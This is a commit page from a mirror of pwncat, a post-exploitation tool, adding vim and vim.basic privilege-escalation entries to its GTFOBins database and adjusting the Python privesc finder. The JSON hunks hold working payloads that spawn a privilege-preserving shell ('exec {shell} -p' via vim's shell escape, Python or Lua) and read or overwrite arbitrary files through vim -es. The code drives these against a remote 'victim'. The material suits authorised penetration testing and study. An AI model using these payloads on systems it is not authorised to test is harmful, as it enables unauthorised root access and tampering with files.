1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-30 12:24:14 +01:00

Got vim seemingly working as a GTFObin...

This commit is contained in:
John Hammond 2020-05-23 04:34:37 -04:00
parent 3801b50f14
commit 2eb9487e64
5 changed files with 66 additions and 16 deletions

View File

@ -879,19 +879,19 @@
{ {
"type": "shell", "type": "shell",
"payload": "{command}", "payload": "{command}",
"args": ["-c", "':!{shell}'", "-c", "'quit'"], "args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
// Include an extra newline to be sure to exit vim itself. // Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n" "exit": "exit\n\n"
}, },
{ {
"type": "shell", "type": "shell",
"payload": "{command}", "payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"] "args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
}, },
{ {
"type": "shell", "type": "shell",
"payload": "{command}", "payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"] "args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
}, },
{ {
"type": "shell", "type": "shell",
@ -907,10 +907,47 @@
{ {
"type": "write", "type": "write",
"stream": "print", "stream": "print",
"payload": "{command} >/dev/null", "payload": "{cat} - | {command}",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"] "args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
"exit": "{ctrl_d}"
}
],
"vim.basic": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
},
{
"type": "write",
"stream": "print",
"payload": "{cat} - | {command}",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
"exit": "{ctrl_d}"
} }
// Vim can PROBABLY file write... but I have not figured that out just yet.
], ],
//------------------------------------------------------------------- //-------------------------------------------------------------------
"wish": [ "wish": [

View File

@ -9,10 +9,6 @@ from sqlalchemy.exc import InvalidRequestError
import warnings import warnings
from sqlalchemy import exc as sa_exc from sqlalchemy import exc as sa_exc
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
import pwncat import pwncat
from pwncat import util from pwncat import util
from pwncat.remote import Victim from pwncat.remote import Victim
@ -80,5 +76,11 @@ def main():
if __name__ == "__main__": if __name__ == "__main__":
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
main() main()
sys.exit(0) sys.exit(0)

View File

@ -238,7 +238,7 @@ class CommandParser:
# We have a connection! Go back to raw mode # We have a connection! Go back to raw mode
pwncat.victim.state = State.RAW pwncat.victim.state = State.RAW
self.running = False self.running = False
except Exception as exc: except (Exception, KeyboardInterrupt) as exc:
traceback.print_exc() traceback.print_exc()
continue continue
@ -299,7 +299,7 @@ class CommandParser:
command.parser.prog = prog_name command.parser.prog = prog_name
except SystemExit: except SystemExit:
# The arguments were icncorrect # The arguments were incorrect
return return

View File

@ -265,7 +265,7 @@ class MethodWrapper:
return self.method.build_payload(self.binary_path, **kwargs) return self.method.build_payload(self.binary_path, **kwargs)
def exit(self, **kwargs) -> str: def exit(self, **kwargs) -> str:
return self.method.binary.gtfo.resolve_binaries( original = self.method.binary.gtfo.resolve_binaries(
self.method.exit, self.method.exit,
ctrl_c=ControlCodes.CTRL_C, ctrl_c=ControlCodes.CTRL_C,
ctrl_z=ControlCodes.CTRL_Z, ctrl_z=ControlCodes.CTRL_Z,
@ -275,6 +275,11 @@ class MethodWrapper:
**kwargs, **kwargs,
) )
if original == "" and Capability.SHELL in self.cap:
original = "exit\n"
return original
def input(self, **kwargs) -> str: def input(self, **kwargs) -> str:
return self.method.binary.gtfo.resolve_binaries( return self.method.binary.gtfo.resolve_binaries(
self.method.input, self.method.input,

View File

@ -277,12 +277,14 @@ class Finder:
for technique in techniques: for technique in techniques:
if Capability.SHELL in technique.capabilities: if Capability.SHELL in technique.capabilities:
try: try:
# Attempt our basic, known technique # Attempt our basic, known technique
shlvl = pwncat.victim.getenv("SHLVL")
exit_script = technique.method.execute(technique) exit_script = technique.method.execute(technique)
pwncat.victim.flush_output(some=True) pwncat.victim.flush_output(some=True)
# Reset the terminal to ensure we are stable # Reset the terminal to ensure we are stable
time.sleep(0.1) time.sleep(0.1) # This seems inevitable for some privescs...
pwncat.victim.reset() pwncat.victim.reset()
# Check that we actually succeeded # Check that we actually succeeded
@ -300,7 +302,9 @@ class Finder:
# Get out of this subshell. We don't need it # Get out of this subshell. We don't need it
# pwncat.victim.process(exit_script, delim=False) # pwncat.victim.process(exit_script, delim=False)
pwncat.victim.run(exit_script, wait=False) pwncat.victim.run(exit_script, wait=False)
time.sleep(0.1) # Still inevitable for some privescs...
pwncat.victim.recvuntil("\n") pwncat.victim.recvuntil("\n")
# Clean up whatever mess was left over # Clean up whatever mess was left over
@ -312,6 +316,8 @@ class Finder:
# Continue on as if it hadn't worked. # Continue on as if it hadn't worked.
except PrivescError: except PrivescError:
pass pass
except ValueError:
raise PrivescError
if Capability.READ in technique.capabilities: if Capability.READ in technique.capabilities:
readers.append(technique) readers.append(technique)
if Capability.WRITE in technique.capabilities: if Capability.WRITE in technique.capabilities: